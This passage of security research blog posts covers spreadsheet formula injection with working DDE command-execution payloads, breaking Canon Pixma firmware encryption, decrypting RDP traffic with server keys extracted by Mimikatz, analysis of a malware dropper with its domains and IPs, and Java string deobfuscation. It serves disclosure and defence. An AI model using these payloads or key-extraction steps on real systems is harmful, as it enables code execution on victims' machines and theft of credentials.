Context found that by specifying some creative arguments and a magic number, it’s possible to craft a ‘link’ that hijacks the computer of whoever opens the document. The following formula simply launches calc.exe, but it could just as easily conscript the computer into a botnet or do just about anything else.

        =DDE("cmd";"/C calc";"__DdeLink_60_870516294")

When this formula is viewed in a typical spreadsheet, the user is shown an innocuous warning first:





However, when the payload is inside a CSV, the command is executed before the warning is displayed.

This vulnerability was privately disclosed to the affected vendors on the 9th July 2014. OpenOffice and LibreOffice patched it on 21st August and the 10th July respectively. OpenOffice classified it as CVE-2014-3524 and LibreOffice failed to acknowledge it.

This is unlikely to be the last formula-based vulnerability, and formula injection provides an excellent delivery mechanism for such exploits. A given computer’s susceptibility to attack can be assessed using the INFO formula, which helpfully returns the spreadsheet software’s name, operating system and version number. Conditional IF formulae can then be used to deliver the appropriate payload.


Exploiting trust relationships

A second, more subtle technique can be used to hijack users’ computers without relying on an unpatched vulnerability in client software.

We will once again use our good friend DDE, but this time target Microsoft Excel. In Excel, the syntax to execute arbitrary commands is simply:

        =cmd|' /C calc'!A0

Microsoft is clearly aware that DDE can be used maliciously; opening a document containing DDE triggers two fearsome security warnings:



However, there is a serious issue with these warning messages: they both recommend that the user click ‘No’ if they do not trust the source of the file. If you had personally generated a spreadsheet from a website you trust, would you trust it? You might, if you had skipped the section on formula injection. This is not a vulnerability in Excel, but in every website that places active content from untrusted sources into spreadsheets.


Remediation

Spreadsheet software could take steps to mitigate some of these attacks, but preventing formula injection is ultimately the responsibility of every application that generates spreadsheets containing user-supplied content. At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’ with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed.
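A minimal sketch of that defence in Python follows. Note that the article identifies only ‘=’ as the trigger; guarding ‘+’, ‘-’ and ‘@’ as well is our assumption, since some spreadsheet software also treats those as formula starts:

```python
def sanitise_cell(value):
    """Prefix potential formula cells with an apostrophe so spreadsheet
    software treats them as literal text. The '=' rule is from the post;
    '+', '-' and '@' are an extra defensive assumption."""
    if value and value[0] in "=+-@":
        return "'" + value
    return value
```

Applied to every user-supplied cell before it is written to the exported file, this ensures the cell is displayed as text rather than evaluated.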

Another lesson from this is that .csv and .tsv files should not be viewed as equivalent to .txt files in terms of safety, as it’s simple to embed active content into them.

Finally, ensure you’re running Apache OpenOffice version 4.1.1 or later, and LibreOffice version 4.2.5 or later.


Further research

This issue isn’t specific to web applications or any particular file format – any situation where untrusted content ends up in a spreadsheet could be exploited. Aside from identifying the numerous vulnerable applications, there is plenty of scope for further research on the attack technique itself. A key improvement would be finding a way to extract content from documents without relying on any user interaction. Finally, spreadsheet software presents a soft attack surface relative to web browsers, so further investigation is likely to reveal additional formula-based code execution vulnerabilities.

Thanks to Rohan Durve for help crafting the DDE payloads, and the OpenOffice security team for gracefully handling them.

Upcoming service announcement: IRIS, a new aperture on Incident Response

Rapid incident response is a core function of Context's Response division and we pride ourselves on the close relationships and integration we build with our clients. However, we have found an increasing need amongst our clients for access to our Response services in a more formalised manner, allowing them to be included as a specific and integrated part of the incident response planning process. Fundamentally this means we can provide these services in such a way that clients can call upon them during the high pressure of live incident response with the assurance that the resource and support will be available when they need it.

Context has developed the Incident Response Investigation Support Service (a.k.a. IRIS) to provide access to Context Incident Response consultants, expertise and capability within timeframes defined by a Service Level Agreement. This service is being offered on a subscription or retainer basis, providing a cost effective way of gaining reliable access to capability that is a foundational requirement for effective incident response.

Aside from fulfilling this specific requirement, Context believes that IRIS will also provide significant additional benefits to subscribed clients. Key among these will be the potential for reductions in overheads and costs associated with incident response due to the reduced requirement to maintain the necessary capability internally. The maintenance of analytic software suites and supporting hardware alone are a significant ongoing cost for many organisations, not to mention the teams and skill requirements to use them.

Context recognises the difficulty of acquiring and retaining the specialist information security professionals, skillsets and tools within the average organisation on a cost-effective basis. Even many larger organisations that employ information security teams, including individuals with incident response skillsets, find it difficult to recruit them in the first instance due to an industry-wide information security skills shortage. Additionally, core cyber security skillsets can have a very short "half-life", and constant use is required to maintain them at an effective level. This constant exposure is difficult to provide within most internal information security teams.

The range of skills required for a well-rounded incident response team may necessitate a team significantly larger than would otherwise be required for core network administration, which, combined with the increasing premium that information security skills command in the marketplace, can stretch budgets to an unacceptable degree. Add to this the associated costs of software licensing, hardware and the ongoing training necessary to do the job, and providing adequate incident response capability can become prohibitive for many organisations.

IRIS seeks to address these challenges by providing an alternative to standing up and maintaining these capabilities internally, and while the commercial aspects are still in the process of being finalised, we are confident that it will be a very cost effective solution that will provide this capability at a fraction of the overhead.

This new service is on track to take its first subscribers in October and will initially be available within the UK, although coverage is likely to expand to other areas in due course. If your organisation has specific requirements along these lines we welcome enquiries and will work with you to scope IRIS coverage.  The service will be offered at a number of levels as defined by the SLAs provided - with coverage and response times ranging from 24/7, 365 days a year, with 24 hour "boots on ground" response, through to business hours coverage and response within 3 business days. Given this flexibility we believe that the service will be a viable and valuable option for organisations of any size, from small start-ups through to our larger multinational clients.

Should you wish to register interest in this service or would like further information, then please get in touch with your account manager, or contact us at info@contextis.co.uk.

Hacking Canon Pixma Printers - Doomed Encryption

This blog post is another in the series demonstrating current insecurities in devices categorised as the ‘Internet of Things’.  This instalment will reveal how the firmware on Canon Pixma printers (used in the home and by SMEs) can be modified from the Internet to run custom code.  Canon Pixma wireless printers have a web interface that shows information about the printer, for example the ink levels, which allows for test pages to be printed and for the firmware to be checked for updates. 


Figure 1 - Web Interface Pixma MG6450

This interface does not require user authentication, allowing anyone to connect to it.  At first glance the functionality seems relatively benign: you could print out hundreds of test pages and use up all the ink and paper, but so what?  The issue is with the firmware update process.  As well as triggering a firmware update, you can also change the web proxy settings and the DNS server; if you can change these, you can redirect where the printer goes to check for new firmware.  So what protection does Canon use to prevent a malicious person from providing a malicious firmware?  In a nutshell - nothing.  There is no signing (the correct way to do it), only very weak encryption; I will go into the nuts and bolts of how I broke that later in this blog post.  We can therefore create our own custom firmware and update anyone’s printer with a trojanised image which spies on the documents being printed, or use the printer as a gateway into their network.  For demonstration purposes I decided to get Doom running on the printer (Doom as in the classic 90s computer game).  It was not straightforward, as all the operating system dependencies had to be implemented in ARM without access to a debugger, or even multiplication or division - but that's a blog for another day. Here’s the video (sorry the colours aren't perfect):


But would anyone put their printer’s web interface on the Internet? Well, we sampled 9,000 of the 32,000 IPs that Shodan (http://www.shodanhq.com) indicated may have a vulnerable printer. 1,822 of those IPs responded, and 122 of them we believe have a vulnerable firmware version (around 6%). We therefore estimate there are at least 2,000 vulnerable models connected directly to the Internet.

Even if the printer is not directly accessible from the Internet, for example behind a NAT on a user’s home network or on an office intranet, the printer is still vulnerable to remote attack. The lack of authentication makes it vulnerable to cross-site request forgery (CSRF) attacks that modify the printer’s configuration. A colleague (thanks Paul Stone) demonstrated this by making a web page that first scans the local network for vulnerable printers (using a technique called JavaScript port scanning). Once the printer’s IP address has been found, the web page sends a request to the web interface to modify the proxy configuration and trigger a firmware update. Although the printer is not actually on the Internet, this is possible because the malicious web page initiates requests from the user’s browser, which is on the same network as the printer.

Context contacted Canon back in March of this year and we provided them with the information about this issue.  They have informed us that future versions of the printer will have username and password authentication on the web interface.  See at the end of the blog for their full response.

This blog post contains a description of how the encryption was broken.  I will follow it up with a description of how I went from the ability to modify the firmware to actually running custom code which could use the wireless network stack, manipulate the memory and update the screen, as shown in the video.  The firmware does not run an operating system but is a single lump of compressed ARM code, which makes for an interesting reverse engineering challenge, particularly with no debugger or console, and when it takes 10 minutes to update a printer which we don’t want to brick.

How the encryption was broken

In this section of the blog I will go into the nerdy details of how the encryption was broken.

Let’s start by looking at the encrypted firmware; it looks like this:


Figure 2 - Encrypted Firmware

You can see repeating patterns (one pattern is highlighted above) in the encrypted firmware, meaning that the encryption is not industry best practice.  The repeating pattern gives us a clue as to the length of the key: in this case the pattern is 0x30 bytes long, so the key length is either 0x30 or a factor of it.  Looking at the character frequency also makes it clear that this is not good crypto:


Figure 3 - Character Frequency Analysis of Encrypted firmware (vertical axis is frequency, horizontal byte 0-0xff)
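The key-length deduction can be sketched as a Kasiski-style examination: find the distances between repeated ciphertext substrings and take their greatest common divisor. This is an illustrative reconstruction, not the tooling actually used in the analysis:

```python
from functools import reduce
from math import gcd

def likely_key_length(data, chunk=8, max_dist=256):
    """Kasiski-style sketch: with a repeating-key XOR over repetitive
    plaintext, distances between repeated ciphertext substrings are all
    multiples of the key length, so their GCD is a strong candidate."""
    last_seen = {}
    distances = []
    for i in range(len(data) - chunk + 1):
        sub = bytes(data[i:i + chunk])
        if sub in last_seen:
            distances.append(i - last_seen[sub])
        last_seen[sub] = i
    distances = [d for d in distances if d <= max_dist]
    return reduce(gcd, distances) if distances else None
```

Run over ciphertext exhibiting the repeating pattern in Figure 2, this would report the repeat distance (or a factor of it), leaving 0x30 and its factors as the candidate key lengths.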

If we assume that the encryption algorithm is at least based on XORing a key with the plain text, then what we have is basic XOR encryption:


Figure 4 - Basic XOR Encryption

If this is the case then the blocks are as follows:

P0 ^ K = C0
P1 ^ K = C1
Pn ^ K = Cn

While we don’t know what the key is, we can remove it from the encrypted data by XORing the first block of ciphertext with all the other blocks.  Therefore:

P0 ^ K ^ C0 = 0
P1 ^ K ^ C0 = P1 ^ P0
Pn ^ K ^ C0 = Pn ^ P0
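The cancellation step above can be sketched in a few lines of Python (an illustration of the maths, not the original tooling):

```python
def strip_key(ciphertext, key_len):
    """XOR every block with the first ciphertext block C0. Since
    Cn = Pn ^ K, we get Cn ^ C0 = Pn ^ P0: the unknown key cancels,
    leaving an all-zero first block and Pn ^ P0 thereafter."""
    c0 = ciphertext[:key_len]
    return bytes(b ^ c0[i % key_len] for i, b in enumerate(ciphertext))
```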

This means that the first block is zero and each remaining block is its original plain text XORed with the plain text of the first block - hence no key.  If we can work out the plain text of the first block then we will get the full decryption.  If we look at the results we get this:


Figure 5 - Encrypted firmware with first block XORed with the rest

The graph looks neater but the resulting text is still gibberish.  What we need to do is work out what the first block of data is, and then we can use it to recover the original data.  After a lot of playing around with different options, I found that older firmwares for Canon printers did not have this ‘encryption’ and use the SRecord format (http://en.wikipedia.org/wiki/SREC_%28file_format%29).  This is an ASCII format commonly used for writing to the memory of embedded devices, for example:


Figure 6 - SRecord example (source Wikipedia)

The format only uses ASCII hex digits, newlines and the ‘S’ at the start of each line.  This provides a very useful crib for what will be at the start of the Canon firmware (assuming they are using SRecords).  The first character must be an ‘S’ followed by a series of ASCII hex digits.  So we make a guess at what the first line might be, for example:

S00000000000000000000000000000000000000000000000

And see the resulting decryption:


Figure 7 - First attempt at decryption

The shape of the graph fits roughly with ASCII text (values mainly between 0x30-0x7f), and we can see that the first column (highlighted in green) only contains ASCII values, which confirms we have the first byte of the SRecord format correct.  However, the second column contains characters which are not valid for the file format (highlighted in blue), so the second character of the plain text is not a zero.  The third column (in orange) is correct, as all its characters are valid, including the 0xd line feed character.  At this point we can automate the brute forcing of the characters, because we know the subset of possible characters and can validate each column to ensure that no invalid characters are decrypted.  After this process we find that the key length is actually 0x10 and we have a valid SRecord.  SRecords have checksums, which helps us confirm we have the correct key; the file looks like this:


Figure 8 - Plain text firmware

There is no other protection in the firmware file.  SRecords have a checksum on each line, but there is no signing of the firmware.  Because we can decrypt the firmware, we can modify the SRecords, re-encrypt the file and update the printer with our own custom firmware.
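For reference, the per-line SRecord checksum mentioned above can be validated as sketched below. The ones'-complement rule comes from the standard SREC format, not from anything Canon-specific:

```python
def srec_checksum_ok(line):
    """Validate one SRecord line: the final byte is the ones' complement
    of the low byte of the sum of the count, address and data bytes."""
    payload = bytes.fromhex(line[2:])   # skip the 'S' and the record type
    return ((sum(payload[:-1]) & 0xFF) ^ 0xFF) == payload[-1]
```

Any tool that patches the decrypted SRecords must recompute these checksums before re-encrypting, or the printer will reject the lines.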

Vendor Response Timeline
  • 14th March 2014 – Canon notified of the issue.
  • 18th March 2014 – Canon request further information.
  • 19th May 2014 – Canon escalated the issue.
  • 29th May 2014 – Request permission to publish this blog post.
  • 5th June 2014 – Canon acknowledges the issue.
  • 9th June 2014 – Canon visit Context to discuss this release.
  • 12th Sept 2014 – Blog release in conjunction with a presentation at 44Con.

Canon provided the following statement regarding this issue:

“We thank Context for bringing this issue to our attention; we take any potential security vulnerability very seriously.  At Canon we work hard at securing all of our products, however with diverse and ever-changing security threats we welcome input from others to ensure our customers are as well protected as possible.

We intend to provide a fix as quickly as is feasible.  All PIXMA products launching from now onwards will have a username/password added to the PIXMA web interface, and models launched from the second half of 2013 onwards will also receive this update, models launched prior to this time are unaffected. This action will resolve the issue uncovered by Context.”  

Recommendations

Context recommends that you do not put your wireless printer, or any other ‘Internet of Things’ device, on the Internet.  To defend against the CSRF attack, the best advice I can offer is: don’t follow any dodgy links.  Context is not aware of anyone in the wild actively using this type of attack, but hopefully we can increase the security of these types of devices before the bad guys start to. Finally, make sure that you always apply the latest available firmware to your devices. This is often not an automatic process and may require checking the manufacturer’s website for updates.

RDP Replay

Here at Context we work hard to keep our clients safe. During routine client monitoring our analysts noticed some suspicious RDP traffic. It was suspicious for two reasons: firstly, the client was not in the habit of using RDP; and secondly, it had a Chinese keyboard layout. This information is available in the ClientData handshake message of non-SSL traffic, and can easily be seen in Wireshark.


Notice that the keyboard layout is 2052. This, for our client, is bad. I’ve also blanked out the client name, as this information is leaked by the attackers.

I was asked what I could get out of this pcap file. Well, as it turns out, quite a lot!

1 Crypt

The first thing to note is that, after the initial (lengthy) handshake, all messages are encrypted. Most people will just give up at this point. Not me. I’m stubborn. I know Wireshark can decrypt (most) SSL traffic as long as you have the private key. Surely you can do the same with standard RDP encryption? If so, where do I get the private key, how do I get it, and what do I do with it once I have one?

2 First Steps

I got hold of the source code for a Linux RDP client (rdesktop), and found where the crypt exchange takes place. These are all about securely exchanging a shared session key. Hacking the client with a simple “printf” gave me the session key for a single pcap session. So I have the key, what can I do with it? Some experimentation with the decryption routines in rdesktop gave me decrypted data. Surely all I need to do is feed this data into rdesktop in the correct place to get the display rendered. Easy, right? So, what next?

3 Processing the Data

The protocol stack is shown here.

Notice that the stack may or may not include SSL, depending on negotiated capabilities, and that the RDP and Fast Mode headers will differ between the two modes, as this is where the encryption takes place for non-SSL data. If you want detail on the various layers, they are all standard and RFC-based, and Wireshark does a good job of displaying them. So how do I process them? I’m a Unix guy, so this is all done on Linux (Ubuntu to be more specific). I’ll explain my processing a layer at a time.

3.1 Pcap Replay

I had to write software to read a pcap file and play it back in real time (or other specified speed). This was fairly simple to achieve. Playing at full speed is fun, but not very useful.

3.2 Ethernet

I simply skip over this, after checking that the payload is IP4 (type 0x0800).

3.3 TCP/IP

Processing IP4 was not so straightforward, as I had to deal with fragmentation as well as checksum verification. This layer has to live closely with TCP to make sure we have the correct TCP/IP footprint for the data to be processed. For TCP I needed to re-order packets, drop duplicate data and perform checksum verification. By default the tool will “lock on” to the first TCP SYN packet; you can specify a port if your pcap contains more than one TCP stream.
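The reordering and de-duplication logic can be sketched like this - a toy model that ignores sequence-number wraparound, overlapping segments and checksums, which real code must handle:

```python
def reassemble(segments, isn):
    """Toy TCP reassembly sketch. `segments` is a list of
    (sequence_number, payload) tuples in wire order; `isn` is the
    initial sequence number. Duplicates collapse in the dict, and
    out-of-order segments wait until the gap before them is filled."""
    pending = {seq: payload for seq, payload in segments}
    stream, expected = b"", isn
    while expected in pending:
        payload = pending.pop(expected)
        stream += payload
        expected += len(payload)   # next expected sequence number
    return stream
```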

3.4 TPKT / X.224 / T.125

I perform minimal processing of these layers, just parsing, checking lengths and discarding non-payload frames. Setup and negotiation information is of no interest to us. Well, mostly: some of it is of use; for example, the MCS channel negotiation will tell us where to find the clipboard channel. Apart from a few similar details, all I need at this point is the RDP payload data.

3.5 RDP

Microsoft have a very good reference for the RDP protocol

http://msdn.microsoft.com/en-us/library/cc240445.aspx

This was invaluable for getting higher versions of RDP working. I will not go into details here. Feel free to browse the reference material (it will help you sleep). I will explain this processing later.

4 Crypt (Again)

I need to get hold of the session key for each session I want to decrypt/display. The only way to do this is with the private key, as session keys are exchanged using public-key crypto. I’m by no means an expert on these things, but basic public-key crypto goes something like this:


This is a little oversimplified, but the basics are there. It shows that we can recover the session key from the encrypted session key (which we see in the traffic) and the private key from the server. But how do we get that?

This turned out not to be a showstopper as we have access (via our customer) to the server and can extract the private key needed to decrypt the traffic. But how? Where are the keys held, and how do I get to them?

4.1 Accessing your Privates

There are two real variants of encryption used by RDP: the original RDP encryption, using RC4, and SSL. SSL will be used by preference, but older servers and/or clients may not support it and fall back to the older encryption method. I will cover extraction of SSL keys in a moment, but will explain the older-style private key handling first.

4.2 RC4 Key Extraction

Originally (pre-Vista) there was only one RDP private key, and it was stored in the LSA (Local Security Authority) under a key named:

  • L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75

Passcape have a tool for extracting this, as long as you have Admin privileges, and here we can see an example output.


The private key here is c18f99e6……33bd (from 0x110 to 0x14f)

Vista onwards changed the way keys were handled with the introduction of DPAPI (Data Protection API). The length of the private key increased from 512 bits to 2048 bits. The shorter key is still available under the name

  • L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d

The tool from Passcape will not work with DPAPI, so we wrote our own. To access the DPAPI you need to run as System, so we use PsExec (a Sysinternals tool) for this. Here’s an example (on Windows 7):


4.3 SSL Key Extraction

To extract the private key for SSL you will need to use Mimikatz. When I added support for SSL, I used the latest version at the time (from May 2013). I looked at the latest version when putting together this report (October 2014) and did not have much joy with it. It’s probably the way I’m driving the software, but I didn’t spend much time trying to get it to work. Here you will see an example using the older version of Mimikatz on a Windows 7 box. Again, you will need to run this as the System user.
 
Once you have extracted the PFX file, you can use openssl to get the private key:

  • openssl pkcs12 -in infile.pfx -nodes -out outfile.pem

When prompted, the password is: mimikatz

4.4 Decryption

I now know how to get private keys, so I can (in theory) recover session keys. I have all the puzzle pieces, so just need to write something.

I have already explained the processing up to the encryption and RDP layers, so it’s time to tackle the decryption.

Armed with the private key for old-style RDP, this is not too bad a job. I have to perform custom initialisation of the crypto variables, and use both sets for the decryption, but mostly this is taken from freely available software.

SSL was a different matter. I’m using OpenSSL, and there is no support for feeding in data that is not associated with a socket; it does not play nicely. Controlling the initialisation of the crypt variables also took quite a bit of head scratching, and I was relieved to get this part working. Not fun.

5 The RDP layer

RDP is really a rich set of capabilities, and clients negotiate with servers to agree a compatible set to use. We have no control over this, so need to be able to process what was on the wire.

It quickly became apparent that the capabilities supported in rdesktop were not very extensive. Rather than implementing a large amount of functionality myself, I looked elsewhere and found something better suited to my needs in FreeRDP, another open source implementation of RDP.

The APIs available in FreeRDP were not designed for the use (or abuse) that I had planned. I had to chop out and discard most of the functionality it provided. I did re-use the RDP crypt processing, but mostly needed the bitmap/pixmap parsing, caching and processing, and the rendering engine. I also needed to add some functionality (e.g. bulk compression support, as this was used in some of the data we had) and fix the odd bug. I had to make the library more robust, as I was feeding in wild and unexpected data that was not always in the correct state to process, so I needed to guard against NULL pointers and suchlike. This was a long and iterative process, and will probably continue as and when clients need this capability.

This is by no means a full implementation of RDP. Support has only been added for the parts of the protocol specification I needed to process; large parts of the specification are already supported by FreeRDP. Together this covers a large proportion of the specification, but mileage may vary.

5.1 Other Considerations

I mainly focused on data from the server to the client, as this has all the rendering information. Data in the reverse direction has mouse movement and key-press information. This allows me to extract all keys pressed, including hidden (password) text, and track the mouse cursor. This was useful (well, the analysts demanded it), so I added support for this.

The analysts also wanted to watch the output as a video, so I also added support to output directly to a video file (using V4L).

We (again, I mean the analysts) saw that the clipboard was used to transfer data to and from the target machine, so all clipboard selections can be optionally output to disk.

6 Example

Enough talk, let’s see a run of the program. Here I am extracting the RDP keys I need to process the pcap I’m capturing while doing it! You also see the command line and the key press information.  

7 Results

Information gained from viewing the intrusion was invaluable. Details of tradecraft and operational tools showed just how mature the intrusion was. We were also able to get these tools for further analysis (they were normally cleaned up after use). It helped to identify ORBs and compromised machines, and guided the remediation planning. It is also high impact in the board room. Telling the customer they have an intrusion is one thing. Showing them a video of the actors on their network is another thing entirely.


Evasive Measures: "faxmessage.php" malware delivery

In the ongoing malware arms race, attackers are always trying to find creative ways to bypass detection, and this isn't something that is limited to targeted threat actors. In fact, some ingenious evasion techniques seen by Context are the handiwork of more commonplace cyber-criminals looking to spread their malicious code as widely as possible.

A good example of this was observed recently, and consisted of a method that was designed to trick users into downloading zip files containing malicious executables, while also providing the means to evade network defences.

This activity began with a tried and tested methodology that is likely familiar to many cyber security analysts: a malicious link contained within a phishing email, although in this instance the activity came to our attention due to the traffic we saw across the network, rather than from analysis of the phishing email itself. The image below gives an example of this suspicious initial request:


In this example the user clicked on the link and a subsequent request for the resource ‘faxmessage.php’ was sent to an attacker controlled domain, which in this instance was ‘novastore-print(dot)com’. Interestingly the victim’s user-agent information was also contained within the body of the request, likely for profiling purposes.

But here’s where things get interesting…

A response containing the resource was returned but there was something odd about the content. The response from the web server contained very little actual HTML, but it did include an iframe with a zip file base64-encoded and embedded within the page itself.


From the perspective of the user, they were presented with a simple webpage containing the text “Please read the document” along with a download dialog box pointing to the malicious zip file embedded within the page.

The HTTP standard, RFC 1945, states that “any HTTP/1.0 message containing an entity body should include a Content-Type header field defining the media type of that body”. Helpfully the attackers have complied with this as they have stated the data is “text/html” content, which is perfectly valid, but as we know this is not the whole story given the lurking zip file.

This highlights one of the problems of relying on standards definitions in network monitoring, as just monitoring the network for responses containing “Content-Type: application/zip” will not find the suspicious file as it is embedded in the body of the response, which is more-or-less legitimately marked as “text/html” content.


At this point fortunately our user did not proceed any further, but having caught our attention we had a quick closer look. After saving the PHP file and carving out the base64-encoded data, we used a simple bit of "bash-fu" to dump out the content and reveal its true nature…

base64 --decode < carved_b64.txt > doc21641_pdf.mal
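The carve-and-decode step can also be scripted end to end. Below is a minimal Python sketch; the 40-character threshold and the assumption that the longest base64-looking run in the page is the payload are our own heuristics, not part of the original attack:

```python
import base64
import re

def carve_embedded_payload(html: str) -> bytes:
    """Pull the longest base64-looking run out of a page and decode it."""
    candidates = re.findall(r"[A-Za-z0-9+/=]{40,}", html)
    if not candidates:
        raise ValueError("no embedded base64 payload found")
    return base64.b64decode(max(candidates, key=len))

def looks_like_zip(payload: bytes) -> bool:
    """A decoded zip archive starts with the 'PK' local file header magic."""
    return payload[:4] == b"PK\x03\x04"
```

Checking the decoded bytes against known file magics (zip, MZ, PDF) is a quick way to classify what was actually smuggled inside the "text/html" response.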


A quick bit of open source research confirms that this is a malicious file. After running this sample across VirusTotal, it seems Malwarebytes has previously identified this executable masquerading as a PDF:


All of the variants of this first stage dropper that we’ve seen have attempted to connect to domains resolving to a wide range of IP addresses, indicating that the attackers have a large infrastructure at their disposal. The communications all resemble the following format:

GET /0112UK2/ADB7CB0C47E1463/0/51-SP3/0/ HTTP/1.1

The first stage malware acts as a dropper for a second stage crimeware implant. Once run, doc21641_pdf.exe will create or 'drop' another file, “fwygl.exe”, before launching it. The dropped file was constant across the various samples analysed and was created in the following location:

C:\Documents and Settings\<USER>\Local Settings\Temp\fwygl.exe

The executable doc21641_pdf.exe then deletes itself. It does however leave forensic traces such as a Prefetch file in the Windows directory and Shim Cache entry in the registry. The dropped malware fwygl.exe then requests “/images/t2.pnj” from the domain “www.wholesale-motoroilonline[dot]com” which, at the time of analysis, resolved to the IP address 192.163.217.66.

Alternatively, if the dropper cannot connect to this address it attempts to download the same resource from “wholesalesyntheticmotoroil[dot]com”. Both of those domains and the resource string were found within the malware binary and within the subsequent network traffic.

If the dropper successfully connects to either of the destination domains above, the second stage implant is downloaded and installed to C:\WINDOWS\ and given a pseudo-randomly generated name. Although this file is not currently identified as malicious on VirusTotal, it results in further malware which is detected as crimeware:


Once installed, the second stage will connect to the domain "icanhazip[dot]com" followed by the IP addresses below:

176.114.0[.]48

181.41.203[.]237

The network communication can be seen in the following FakeNet output:


An additional SSL connection was also seen attempting to connect to the IP address 212.56.214.130, using an autonomous system in Moldova which is associated with the Dyre botnet:


To conclude, in this example we see this method being used to serve crimeware, but this technique could easily be modified to download any file type in such a way that it would not be presented within web logs or obvious in network traffic. This simple technique will certainly evade some Intrusion Detection Systems that are monitoring for the download of a specific file type based on HTTP header information.

Without measures to specifically detect this activity, network forensics tools would most likely classify the file as HTML, based on the initial request for the PHP file, potentially allowing suspicious content through without adequate screening.

Automating Removal of Java Obfuscation


In this post we detail a method to improve analysis of Java code protected by a particular obfuscator; we document the process that was followed and demonstrate the results of automating it. Obscurity will not stop an attacker: once the method is known, tooling can be developed to automate its removal.

Introduction

Obfuscation is the process of hiding application logic during compilation so that it is difficult to follow. Vendors usually obfuscate in an attempt to protect intellectual property, but it serves a dual purpose in slowing down vulnerability discovery.

Obfuscation comes in many shapes and forms; in this post we focus on a particular subset: string obfuscation, more specifically encrypted string constants. Strings within an application are very useful for understanding logic; for example, logging and exception-handling strings are an excellent window into how an application handles certain states, and can greatly speed up efforts to understand functionality.

For more information on what obfuscation is within the context of Java, see [0].

Note that the following entry assumes the reader has a rudimentary understanding of programming.

Decompilation

Firstly, we extract and load the Java archive (jar) using the tool JD-GUI [1] (a Windows-based GUI tool that decompiles Java “.class” files); this is done by drag-dropping the target jar into the GUI window. The following is what is shown after scrolling down to an interesting looking class:

 
Figure 1 - JD-GUI showing the output from the disassembly

The first observation we can make is that JD-GUI has not successfully decompiled the class file in its entirety. The obfuscator has performed some intentional modifications to the bytecode which have hampered decompilation.

If we follow the sequence of events in the first z function we can see that it does not flow correctly: variables are used where they shouldn't be, and a non-existent variable is returned. The second z function also seems very fishy; the last line is somehow indexing into an integer, which is definitely not allowed in Java. Screenshot shown below.


Figure 2 - Showing the suspicious second 'z' function


Abandoning JD-GUI and picking up trusty JAD [2] (a command line Java .class decompiler) yields better results, but still not perfect:


Figure 3 - Showing the output that JAD generates

We can see that decompilation has failed, as JAD inserts raw JVM instructions (as opposed to high-level Java source); in fact, JAD tells us as much in its command line output. Fortunately it appears that the decoding failures are confined to a consistent but limited set of functions rather than the entire class. Secondly, we can see that the strings are not immediately readable; it is quite obvious that there is some encryption in use. The decryption routine appears to be the function z, as it is called with the encrypted string as the input.

As shown in Figure 2 there are two functions sharing the name (z); this is allowed in object-oriented languages (function overloading [3]) and it is common for obfuscators to exploit such functionality. It is however possible to determine the true order of the called functions by looking at the types or the count of the parameters. Since our first call to z provides a string as the parameter, we can derive the true order and better understand its functionality.

We can see in Figure 4 (below) that the first z converts the input string ‘s’ to a character array: if the length of the array is 1 it performs a bitwise XOR with 0x4D, otherwise it returns the char array as-is. JAD was unable to correctly disassemble the function, but in this case such a simple function is easy to analyse.


Figure 4 - Showing the first 'z' function

The second z function (seen in Figure 5 below) appears to be where the actual decryption is done.


Figure 5 - Second 'z' function, highlighting the interesting integer values

To know what happens with the input we must understand that the JVM is a stack-based machine: operands are pushed onto the stack and operated upon by subsequent instructions.

The first important instruction we see is that the variable i is set to 0; we then see the instruction caload, which loads a character from an array at a given index. While JAD has not successfully decompiled it, we can see that the index is the variable i and the array is the input character array ac (and in fact, ac is pushed onto the stack at the very start of our function). Next, there is a switch statement, which determines the value of byte0.

After the switch statement, byte0 is pushed onto the stack; for the first iteration its value will be 0x51. The following operations perform a bitwise XOR between the byte0 value and the character in ac at index i. Then i is incremented and compared with the length of ac: if the index has reached the length of ac, the ac array is converted to a string and returned; if the index is less than the length of ac, the code jumps back to L3 and performs another iteration on the next index.

In summary, this z function takes the input and loops over it, taking the character at the current index and performing a bitwise XOR against a key that changes depending on the current index. We also note that there is a modulo-5 operation applied to the current index, indicating that there are 5 possible keys (shown in red in Figure 5).

To neaten this up, we will convert the second z to pseudocode:

        keys = [81,54,2,113,77]
        // below input is "#Sq\0368#Ug\002b\"Oq\005(<\030r\003\"!Sp\005$4E" 
        input = [
          0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67, 
          0x02, 0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c, 
          0x18, 0x72, 0x03, 0x22, 0x21, 0x53, 0x70, 0x05, 
          0x24, 0x34, 0x45
        ]

        for i in 0..input.length-1 do
            printf "%c" (keys[i%keys.length] ^ input[i])
       

As you can see from the above code, it converts to a simple loop that performs the bitwise XOR operation on each character within the input string; we have replaced the switch with an index into the keys array.

The code results in the string "resources/system.properties" being printed - not at all an interesting string - but we have achieved decryption.
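The pseudocode above runs as-is in Python with only cosmetic changes; this sketch reproduces the result:

```python
# XOR keys recovered from the switch table (81, 54, 2, 113, 77).
KEYS = [0x51, 0x36, 0x02, 0x71, 0x4D]

# The encrypted string constant carved from the class file.
CIPHERTEXT = [
    0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67,
    0x02, 0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c,
    0x18, 0x72, 0x03, 0x22, 0x21, 0x53, 0x70, 0x05,
    0x24, 0x34, 0x45,
]

def decrypt(data, keys=KEYS):
    """Rolling XOR: the key is selected by index modulo the key count."""
    return "".join(chr(c ^ keys[i % len(keys)]) for i, c in enumerate(data))

print(decrypt(CIPHERTEXT))  # resources/system.properties
```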

Problem analysis

With knowledge of the key and an understanding of the encryption algorithm used, we should now be able to extract all the strings from the class file and decrypt them. Unfortunately this approach fails; this is a result of each class file within the Java archive using a different XOR key. To decrypt the strings en-masse, a different approach is required.

Ideally, we should programmatically extract the key from every class file, and use the extracted key to decrypt the strings within that file. One approach could be to perform the disassembly using JAD, and then write a script to extract the switch table (which holds the XOR key) and the strings using regexes.

This would be reasonably simple but error-prone, and regex just does not seem like an elegant solution. An alternative approach is to write our own Java decompiler, which gives us a nice, abstracted way of performing program analysis. With a larger time investment, this is certainly a more elegant solution.

